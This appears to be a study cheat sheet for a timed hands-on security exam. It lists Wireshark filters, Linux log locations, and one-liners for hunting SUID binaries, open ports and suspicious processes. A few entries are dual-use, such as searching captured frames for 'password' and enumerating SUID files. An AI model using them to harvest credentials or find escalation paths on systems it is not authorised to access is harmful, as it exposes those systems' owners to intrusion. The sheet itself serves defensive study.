Command	Purpose	Key flags
ip.addr == 10.0.0.5	Filter by IP (src or dst)	ip.src / ip.dst for direction
tcp.port == 80	Filter by TCP port	tcp.srcport / tcp.dstport for direction
http.request.method == "POST"	HTTP POST only	http.request.uri contains "login" to narrow further
tcp.flags.syn == 1 && tcp.flags.ack == 0	SYN without ACK (scan)	tcp.flags.reset == 1 for RSTs
dns.qry.name contains "evil"	DNS queries matching substring	dns.flags.response == 1 for responses only
tcp.stream eq 3	One TCP stream	Right-click packet → Follow → TCP Stream to find stream number
frame contains "password"	Any frame whose bytes contain string	Slower than field filters — use for ad-hoc hunts

Linux log paths & triage (6)

Command	Purpose	Key flags
/var/log/auth.log	sudo, sshd, su (Debian / Ubuntu)	RHEL/CentOS uses /var/log/secure
/var/log/syslog \| /var/log/messages	General system messages	Debian vs RHEL naming
/var/log/wtmp /var/log/btmp /var/log/lastlog	Login history (good / failed / per-user last)	Binary files — read with last / lastb / lastlog commands
last -F \| lastb	Successful / failed login history	-F: full timestamps lastb needs root
journalctl -u sshd --since "1 hour ago"	systemd unit logs in a time window	-u: unit -p err..alert _PID=1234 match --since / --until: relative or ISO time
grep -E "Failed\|Invalid" /var/log/auth.log \| awk '{print $(NF-3)}' \| sort \| uniq -c \| sort -rn	Top source IPs of failed SSH logins	Classic brute-force triage one-liner

Linux hunt one-liners (7)

Command	Purpose	Key flags
find / -perm -4000 -type f 2>/dev/null	All SUID binaries	-perm -4000: SUID bit set 2>/dev/null: discard permission-denied noise
find / -perm -2000 -type f 2>/dev/null	All SGID binaries	-2000: SGID
find / -perm -0002 -type d ! -perm -1000 2>/dev/null	World-writable dirs missing sticky bit	-0002: world-write !-perm -1000: exclude sticky-bit dirs
find / -mtime -1 -type f 2>/dev/null	Files modified in last 24h	-mtime -1: modified < 1 day ago -mmin -30: < 30 min
ss -tulnp	Listening TCP/UDP + process	-t TCP -u UDP -l listening -n no resolve -p process
lsof -i :22 \| lsof -p 1234	What's using port 22 / files a PID has open	-i: network -p: by PID -u user: by user
ps -eo pid,ppid,user,cmd --forest	Process tree with parent PID	--forest gives tree view; ppid helps spot orphaned children

Tip: if you can't recall what a flag does without looking, drill that tool. CyberLive is timed — muscle memory wins over recall.